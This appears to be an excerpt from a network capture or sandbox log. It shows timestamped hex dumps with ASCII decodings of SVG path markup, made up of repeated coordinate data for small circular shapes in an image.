                                                                                                                                                                                                                                                                    2023-07-27 19:45:18 UTC1081INData Raw: 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 35 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 38 2e 37 35 2c 32 31 37 2e 35 32 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c
                                                                                                                                                                                                                                                                    Data Ascii: 73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.95,2.41,2.41,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M848.75,217.52a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,
                                                                                                                                                                                                                                                                    2023-07-27 19:45:18 UTC1097INData Raw: 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2e 35 2c 32 39 32 2e 38 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 37 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2e 32 37 2c 32 38 35 2e 39 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e
                                                                                                                                                                                                                                                                    Data Ascii: cls-4" d="M879.5,292.83a1.72,1.72,0,0,1-.77,2.24,2.52,2.52,0,0,1-3.34-.94,2.41,2.41,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M879.27,285.9a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC1113INData Raw: 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 31 30 2c 33 36 31 2e 32 31 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 30 39 2e 37 39 2c 33 35 34 2e 32 38 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33
                                                                                                                                                                                                                                                                    Data Ascii: 2.86"/><path class="cls-4" d="M910,361.21a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"/><path class="cls-4" d="M909.79,354.28a1.71,1.71,0,0,1-.78,2.23,2.5,2.5,0,0,1-3.33-.94,2.3
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC1129INData Raw: 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 36 2e 39 34 2c 32 33 35 2e 37 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 36 2e 37 2c 32 32 38 2e 37 36 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32
                                                                                                                                                                                                                                                                    Data Ascii: 9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M926.94,235.7a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"/><path class="cls-4" d="M926.7,228.76a1.72,1.72,0,0,1-.78,2.24,2
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC1145INData Raw: 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 32 37 2e 31 31 2c 31 37 30 2e 35 37 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 32 37 2e 33 34 2c 31 37 37 2e 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 39 2c 32
                                                                                                                                                                                                                                                                    Data Ascii: 82"/><path class="cls-4" d="M1027.11,170.57a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"/><path class="cls-4" d="M1027.34,177.4a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.92,2.39,2
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC1161INData Raw: 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 31 30 2e 36 39 2c 33 30 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 39 37 2e 35 31 2c 31 31 36 2e 38 38 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33
                                                                                                                                                                                                                                                                    Data Ascii: -.16-2.81"/><path class="cls-4" d="M1010.69,301a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"/><path class="cls-4" d="M997.51,116.88a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.3
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC1177INData Raw: 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 38 31 2e 30 39 2c 32 34 37 2e 33 32 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 38 31
                                                                                                                                                                                                                                                                    Data Ascii: .37,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"/><path class="cls-4" d="M981.09,247.32a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M981
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC1193INData Raw: 2c 31 38 36 2e 38 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 35 31 2e 34 39 2c 31 39 33 2e 36 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e
                                                                                                                                                                                                                                                                    Data Ascii: ,186.81a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"/><path class="cls-4" d="M951.49,193.64a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.92,2.39,2.39,0,0,1-.5,2.85,2.23,2.23,0,0,1-2.
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC1209INData Raw: 30 2c 31 2d 32 2e 38 36 2c 30 41 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 39 32 32 2c 31 32 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 31 2e 36 37 2c 31 33 33 2e 31 32 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 31 2e 39 2c 31 34 30 61 31 2e 36 38 2c 31 2e 36 38 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e
                                                                                                                                                                                                                                                                    Data Ascii: 0,1-2.86,0A2.09,2.09,0,0,1,922,125"/><path class="cls-4" d="M921.67,133.12a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.1,2.1,0,0,1-.15-2.82"/><path class="cls-4" d="M921.9,140a1.68,1.68,0,0,1,.76-2.2,2.
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC1225INData Raw: 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 30 35 2e 34 37 2c 32 37 30 2e 33 39 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 41 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2c 39 30 39 2c 32 37 32 61 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c
                                                                                                                                                                                                                                                                    Data Ascii: 48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M905.47,270.39a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.29.93A2.38,2.38,0,0,1,909,272a2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC1241INData Raw: 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 35 2e 36 35 2c 32 30 39 2e 38 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 35 2e 38 38 2c 32 31 36 2e 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d
                                                                                                                                                                                                                                                                    Data Ascii: class="cls-4" d="M875.65,209.87a1.69,1.69,0,0,1,.76-2.2,2.49,2.49,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><path class="cls-4" d="M875.88,216.7a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC1257INData Raw: 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 36 2e 30 35 2c 31 35 36 2e 31 39 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22
                                                                                                                                                                                                                                                                    Data Ascii: 36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"/><path class="cls-4" d="M846.05,156.19a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.16-2.81"/><path class="cls-4" d="
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC1273INData Raw: 2c 32 38 36 2e 36 33 61 31 2e 36 38 2c 31 2e 36 38 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 32 39 2e 38 36 2c 32 39 33 2e 34 35 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32
                                                                                                                                                                                                                                                                    Data Ascii: ,286.63a1.68,1.68,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.92,2.37,2.37,0,0,1-.5,2.85,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><path class="cls-4" d="M829.86,293.45a1.7,1.7,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.21,2.21,0,0,1-2
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC1289INData Raw: 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 30 2c 32 33 32 2e 39 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 30 2e 32 36 2c 32 33 39 2e 37 37 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39
                                                                                                                                                                                                                                                                    Data Ascii: ,0,0,1-.16-2.81"/><path class="cls-4" d="M800,232.94a1.7,1.7,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"/><path class="cls-4" d="M800.26,239.77a1.7,1.7,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.9
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC1305INData Raw: 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 30 35 2c 32 32 39 2e 32 35 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 30 34 2e 37 33 2c 32 32 31 2e 35 33 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39
                                                                                                                                                                                                                                                                    Data Ascii: 37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M505,229.25a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M504.73,221.53a1.92,1.92,0,0,1-.87,2.49,2.79,2.79
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC1321INData Raw: 3d 22 4d 35 32 33 2e 38 31 2c 38 39 2e 35 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 32 33 2e 35 35 2c 38 31 2e 38 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e
                                                                                                                                                                                                                                                                    Data Ascii: ="M523.81,89.56a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M523.55,81.84a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC1337INData Raw: 2e 36 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 35 37 2e 35 32 2c 31 35 37 2e 39 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33
                                                                                                                                                                                                                                                                    Data Ascii: .66a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M557.52,157.94a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3
